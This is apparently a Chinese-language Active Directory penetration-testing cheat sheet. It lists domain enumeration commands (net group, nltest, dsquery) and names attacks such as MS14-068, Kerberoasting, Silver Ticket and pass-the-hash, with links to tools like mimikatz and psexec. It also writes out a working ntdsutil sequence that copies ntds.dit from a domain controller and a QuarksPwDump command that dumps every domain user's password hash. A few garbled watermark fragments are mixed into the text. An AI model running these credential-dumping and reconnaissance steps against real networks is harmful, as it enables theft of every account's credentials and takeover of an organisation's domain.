初级AD域渗透系列
net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admins” /domain 获得企业管理员列表 net localgroup administrators /domain 获取域内置administrators组用户,这个组内成员包含enterprise admins与domain admins,权限一样 net group “domain controllers” /domain 获得域控制器列表 net group “domain computers” /domain 获得所有域成员计算机列表 net user /domain 获得所有域用户列表 net user someuser /domain 获得指定账户someuser的详细信息 net accounts /domain 获得域密码策略设置,密码长短,错误锁定等信息 nltest /domain_trusts 获取域信任信息 net view net view /domain:域名 net config workstation systeminfo ipconfig /all cmdkey /list echo %logonserver% ping -n 1 hostname
例:dsquery server -domain super.com | dsget server -dnsname -site (搜索域内所有域控制器并显示他们的DNS主机名和站点名称)
查询域内计算机:dsquery computer
例:dsquery computer domainroot -name admin* -limit 10(搜索域内名称以"admin"开头的10台机器))
查询域用户:dsquery user
dsquery user domainroot -name admin* -limit 10(搜索域内以"admin" 开头的10个用户)
查询域内联系人:dsquery contact
例:dsquery contact domainroot -name admin* -limit 10 (搜索域内以admin开头的10个联系人)
查询域内子网:dsquery subnet - 低调求发展.
查询域内用户组:dsquery group6 B, K' T% U& |
例:dsquery group dc=super,dc=com |more (搜索在DC=SUPER,DC=COM 雨中的所有组
查询域内组织单位:dsquery ou
查询域内站点: dsquery site
例:dsquery site -o rdn (搜索域中所有站点的名称)
注:-limit 参数不指定查询数量,则默认显示前100条结果
例:dsquery user domainroot -name admin* -limit 10(搜索域内以"admin" 开头的前10个用户)
神器kekeo [ms14068,比PyKEK方便] GPP [KB2962486] 十分钟爱SQL SERVER 弱口令和潜在的Silver Ticket攻击 [SPN] 本地administrator帐户通杀 + Incognito DomainCache的破解 管理员配置错误
工具:
1.mimikatz.exe
https://github.com/gentilkiwi/mimikatz/
2.Pwdump7.exe
3.QuarksPwDump.exe
4.psexec.exe
https://technet.microsoft.com/ko-kr/sysinternals/bb897553.aspx
5.kerberoast
https://github.com/nidem/kerberoast
6.WMIEXEC.vbs
https://www.t00ls.net/thread-21167-1-1.html
域控导出ntds.dit ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit ntdsutil snapshot "unmount {GUID}" quit quit ntdsutil snapshot "delete {GUID}" quit quit 然后用QuarksPwDump直接dump列表。 QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit
内网渗透相关
渗透学习案例:https://github.com/l3m0n/pentest_study
导出当前域内所有用户hash的技术整理:http://drops.wooyun.org/tips/6617
在远程系统上执行程序的技术整理:http://drops.wooyun.org/tips/7358
利用Powershell快速导出域控所有用户Hash:http://drops.wooyun.org/tips/10181
域渗透——Local Administrator Password Solution:http://drops.wooyun.org/tips/10496
域渗透——Pass The Hash & Pass The Key:http://drops.wooyun.org/tips/11631
渗透技巧——通过cmd上传文件的N种方法:http://drops.wooyun.org/tips/14101
渗透技巧——如何巧妙利用PSR监控Windows桌面:http://drops.wooyun.org/tips/13125
安全分析